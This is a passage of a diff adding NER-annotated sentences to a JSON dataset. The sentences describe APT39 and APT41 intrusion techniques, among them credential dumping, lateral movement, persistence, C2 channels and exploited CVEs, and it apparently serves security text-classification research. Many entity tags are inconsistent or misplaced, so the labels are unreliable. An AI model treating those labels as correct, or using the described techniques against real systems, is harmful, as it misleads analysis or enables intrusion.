{ + "tokens": [ + "APT39", + "has", + "used", + "different", + "versions", + "of", + "Mimikatz", + "to", + "obtain", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "PowerShell", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "a", + "command", + "line", + "utility", + "and", + "a", + "network", + "scanner", + "written", + "in", + "python." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "various", + "strains", + "of", + "malware", + "to", + "query", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "maintained", + "persistence", + "using", + "the", + "startup", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "been", + "seen", + "using", + "RDP", + "for", + "lateral", + "movement", + "and", + "persistence,", + "in", + "some", + "cases", + "employing", + "the", + "rdpwinst", + "tool", + "for", + "mangement", + "of", + "multiple", + "sessions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "NBTscan", + "and", + "custom", + "tools", + "to", + "discover", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "SMB", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "used", + "secure", + "shell", + "(SSH)", + "to", + "move", + "laterally", + "among", + "their", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "created", + "scheduled", + "tasks", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "a", + "screen", + "capture", + "utility", + "to", + "take", + "screenshots", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "post-exploitation", + "tools", + "including", + "RemCom", + "and", + "the", + "Non-sucking", + "Service", + "Manager", + "(NSSM)", + "to", + "execute", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "modified", + "LNK", + "shortcuts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "packed", + "tools", + "with", + "UPX,", + "and", + "has", + "repacked", + "a", + "modified", + "version", + "of", + "Mimikatz", + "to", + "thwart", + "anti-virus", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "leveraged", + "spearphishing", + "emails", + "with", + "malicious", + "attachments", + "to", + "initially", + "compromise", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "leveraged", + "spearphishing", + "emails", + "with", + "malicious", + "links", + "to", + "initially", + "compromise", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "used", + "Remexi", + "to", + "collect", + "usernames", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "modified", + "and", + "used", + "customized", + "versions", + "of", + "publicly-available", + "tools", + "like", + "PLINK", + "and", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "stolen", + "credentials", + "to", + "compromise", + "Outlook", + "Web", + "Access", + "(OWA)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "utilized", + "malicious", + "VBS", + "scripts", + "in", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "used", + "HTTP", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT39", + "has", + "installed", + "ANTAK", + "and", + "ASPXSPY", + "web", + "shells." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "leveraged", + "sticky", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "added", + "user", + "accounts", + "to", + "the", + "User", + "and", + "Admin", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "created", + "a", + "RAR", + "archive", + "of", + "targeted", + "files", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "BITSAdmin", + "to", + "download", + "and", + "install", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "deployed", + "Master", + "Boot", + "Record", + "bootkits", + "on", + "Windows", + "systems", + "to", + "hide", + "their", + "malware", + "and", + "maintain", + "persistence", + "on", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "attempted", + "to", + "remove", + "evidence", + "of", + "some", + "of", + "its", + "activity", + "by", + "deleting", + "Bash", + "histories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT41", + "attempted", + "to", + "remove", + "evidence", + "of", + "some", + "of", + "its", + "activity", + "by", + "clearing", + "Windows", + "security", + "and", + "system", + "events." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "cloned", + "victim", + "user", + "Git", + "repositories", + "during", + "intrusions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "leveraged", + "code-signing", + "certificates", + "to", + "sign", + "malware", + "when", + "targeting", + "both", + "gaming", + "and", + "non-gaming", + "organizations." + ], + "ner_tags": [ + "B-Idus", + "B-Org", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "compiled", + "HTML", + "(.chm)", + "files", + "for", + "targeting." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "gained", + "access", + "to", + "production", + "environments", + "where", + "they", + "could", + "inject", + "malicious", + "code", + "into", + "legitimate,", + "signed", + "files", + "and", + "widely", + "distribute", + "them", + "to", + "end", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "support", + "initial", + "access,", + "APT41", + "gained", + "access", + "to", + "databases", + "with", + "information", + "about", + "existing", + "accounts", + "as", + "well", + "as", + "plaintext", + "and", + "hashed", + "passwords." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "BrowserGhost,", + "a", + "tool", + "designed", + "to", + "obtain", + "credentials", + "from", + "browsers,", + "to", + "retrieve", + "information", + "from", + "password", + "stores." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "used", + "search", + "order", + "hijacking", + "to", + "execute", + "malicious", + "payloads,", + "such", + "as", + "Winnti", + "RAT." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "APT41", + "used", + "legitimate", + "executables", + "to", + "perform", + "DLL", + "side-loading", + "of", + "their", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "DNS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "a", + "ransomware", + "called", + "Encryptor", + "RaaS", + "to", + "encrypt", + "files", + "on", + "the", + "targeted", + "systems", + "and", + "provide", + "a", + "ransom", + "note", + "to", + "the", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "transfers", + "post-exploitation", + "files", + "dividing", + "the", + "payload", + "into", + "fixed-size", + "chunks", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "uploaded", + "files", + "and", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "legitimate", + "websites", + "for", + "C2", + "through", + "dead", + "drop", + "resolvers", + "(DDR),", + "including", + "GitHub,", + "Pastebin,", + "and", + "Microsoft", + "TechNet." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "built-in", + "<code>net</code>", + "commands", + "to", + "enumerate", + "domain", + "administrator", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "used", + "DGAs", + "to", + "change", + "their", + "C2", + "servers", + "monthly." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "configured", + "payloads", + "to", + "load", + "via", + "LD_PRELOAD." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "To", + "support", + "initial", + "access,", + "APT41", + "gained", + "access", + "to", + "databases", + "with", + "information", + "about", + "existing", + "accounts", + "and", + "lists", + "of", + "employees." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "APT41", + "has", + "encrypted", + "payloads", + "using", + "the", + "Data", + "Protection", + "API", + "(DPAPI),", + "which", + "relies", + "on", + "keys", + "tied", + "to", + "specific", + "user", + "accounts", + "on", + "specific", + "machines.", + "APT41", + "has", + "also", + "environmentally", + "keyed", + "second", + "stage", + "malware", + "with", + "an", + "RC5", + "key", + "derived", + "in", + "part", + "from", + "the", + "infected", + "system's", + "volume", + "serial", + "number." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "exploited", + "CVE-2020-10189", + "against", + "Zoho", + "ManageEngine", + "Desktop", + "Central", + "through", + "unsafe", + "deserialization,", + "and", + "CVE-2019-19781", + "to", + "compromise", + "Citrix", + "Application", + "Delivery", + "Controllers", + "(ADC)", + "and", + "gateway", + "devices.", + "APT41", + "leveraged", + "vulnerabilities", + "such", + "as", + "ProxyLogon", + "exploitation", + "or", + "SQL", + "injection", + "for", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "leveraged", + "the", + "follow", + "exploits", + "in", + "their", + "operations:", + "CVE-2012-0158,", + "CVE-2015-1641,", + "CVE-2017-0199,", + "CVE-2017-11882,", + "and", + "CVE-2019-3396." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "APT41", + "compromised", + "an", + "online", + "billing/payment", + "service", + "using", + "VPN", + "access", + "between", + "a", + "third-party", + "service", + "provider", + "and", + "the", + "targeted", + "payment", + "service." + ], + "ner_tags": [ + "B-Idus", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "B-Org", + "B-Org" + ] + }, + { + "tokens": [ + "APT41", + "used", + "the", + "Steam", + "community", + "page", + "as", + "a", + "fallback", + "mechanism", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "deleted", + "files", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "exploit", + "payloads", + "that", + "initiate", + "download", + "via", + "ftp." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT41", + "has", + "executed", + "<code>file", + "/bin/pwd</code>", + "on", + "exploited", + "victims,", + "perhaps", + "to", + "return", + "architecture", + "related", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "developed", + "a", + "custom", + "injector", + "that", + "enables", + "an", + "Event", + "Tracing", + "for", + "Windows", + "(ETW)", + "bypass,", + "making", + "malicious", + "processes", + "invisible", + "to", + "Windows", + "logging." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "certutil", + "to", + "download", + "additional", + "files.", + "APT41", + "downloaded", + "post-exploitation", + "tools", + "such", + "as", + "Cobalt", + "Strike", + "via", + "command", + "shell", + "following", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "a", + "keylogger", + "called", + "GEARSHIFT", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "used", + "hashdump,", + "Mimikatz,", + "and", + "the", + "Windows", + "Credential", + "Editor", + "to", + "dump", + "password", + "hashes", + "from", + "memory", + "and", + "authenticate", + "to", + "other", + "user", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "uses", + "remote", + "shares", + "to", + "move", + "and", + "remotely", + "execute", + "payloads", + "during", + "lateral", + "movemement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "built-in", + "<code>net</code>", + "commands", + "to", + "enumerate", + "local", + "administrator", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "created", + "user", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "created", + "services", + "to", + "appear", + "as", + "benign", + "system", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "attempted", + "to", + "masquerade", + "their", + "files", + "as", + "popular", + "anti-virus", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "a", + "malware", + "variant", + "called", + "GOODLUCK", + "to", + "modify", + "the", + "registry", + "in", + "order", + "to", + "steal", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "the", + "storescyncsvc.dll", + "BEACON", + "backdoor", + "to", + "download", + "a", + "secondary", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "ntdsutil", + "to", + "obtain", + "a", + "copy", + "of", + "the", + "victim", + "environment", + "<code>ntds.dit</code>", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "a", + "malware", + "variant", + "called", + "WIDETONE", + "to", + "conduct", + "port", + "scans", + "on", + "specified", + "subnets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "the", + "<code>net", + "share</code>", + "command", + "as", + "part", + "of", + "network", + "reconnaissance." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "VMProtected", + "binaries", + "in", + "multiple", + "intrusions." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "uses", + "tools", + "such", + "as", + "Mimikatz", + "to", + "enable", + "lateral", + "movement", + "via", + "captured", + "password", + "hashes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "performed", + "password", + "brute-force", + "attacks", + "on", + "the", + "local", + "admin", + "account." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "<code>net", + "group</code>", + "commands", + "to", + "enumerate", + "various", + "Windows", + "user", + "groups", + "and", + "permissions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "leveraged", + "PowerShell", + "to", + "deploy", + "malware", + "families", + "in", + "victims’", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "malware", + "TIDYELF", + "loaded", + "the", + "main", + "WINTERLOVE", + "component", + "by", + "injecting", + "it", + "into", + "the", + "iexplore.exe", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "a", + "tool", + "called", + "CLASSFON", + "to", + "covertly", + "proxy", + "network", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "queried", + "registry", + "values", + "to", + "determine", + "items", + "such", + "as", + "configured", + "RDP", + "ports", + "and", + "network", + "configurations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "created", + "and", + "modified", + "startup", + "files", + "for", + "persistence.", + "APT41", + "added", + "a", + "registry", + "key", + "in", + "<code>HKLM\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Svchost</code>", + "to", + "establish", + "persistence", + "for", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "RDP", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "deployed", + "a", + "Monero", + "cryptocurrency", + "mining", + "tool", + "in", + "a", + "victim’s", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "deployed", + "rootkits", + "on", + "Linux", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "a", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "transferred", + "implant", + "files", + "using", + "Windows", + "Admin", + "Shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT41", + "uses", + "the", + "Chinese", + "website", + "fofa.su,", + "similar", + "to", + "the", + "Shodan", + "scanning", + "service,", + "for", + "passive", + "scanning", + "of", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "a", + "compromised", + "account", + "to", + "create", + "a", + "scheduled", + "task", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Idus", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "extracted", + "user", + "account", + "data", + "from", + "the", + "Security", + "Account", + "Managerr", + "(SAM),", + "making", + "a", + "copy", + "of", + "this", + "database", + "from", + "the", + "registry", + "using", + "the", + "<code>reg", + "save</code>", + "command", + "or", + "by", + "exploiting", + "volume", + "shadow", + "copies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "svchost.exe", + "and", + "Net", + "to", + "execute", + "a", + "system", + "service", + "installed", + "to", + "launch", + "a", + "Cobalt", + "Strike", + "BEACON", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "uses", + "packers", + "such", + "as", + "Themida", + "to", + "obfuscate", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "sent", + "spearphishing", + "emails", + "with", + "attachments", + "such", + "as", + "compiled", + "HTML", + "(.chm)", + "files", + "to", + "initially", + "compromise", + "their", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "uses", + "multiple", + "built-in", + "commands", + "such", + "as", + "<code>systeminfo</code>", + "and", + "`net", + "config", + "Workstation`", + "to", + "enumerate", + "victim", + "system", + "basic", + "configuration", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "collected", + "MAC", + "addresses", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "enumerated", + "IP", + "addresses", + "of", + "network", + "resources", + "and", + "used", + "the", + "<code>netstat</code>", + "command", + "as", + "part", + "of", + "network", + "reconnaissance.", + "The", + "group", + "has", + "also", + "used", + "a", + "malware", + "variant,", + "HIGHNOON,", + "to", + "enumerate", + "active", + "RDP", + "sessions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "has", + "executed", + "<code>whoami</code>", + "commands,", + "including", + "using", + "the", + "WMIEXEC", + "utility", + "to", + "execute", + "this", + "on", + "remote", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ 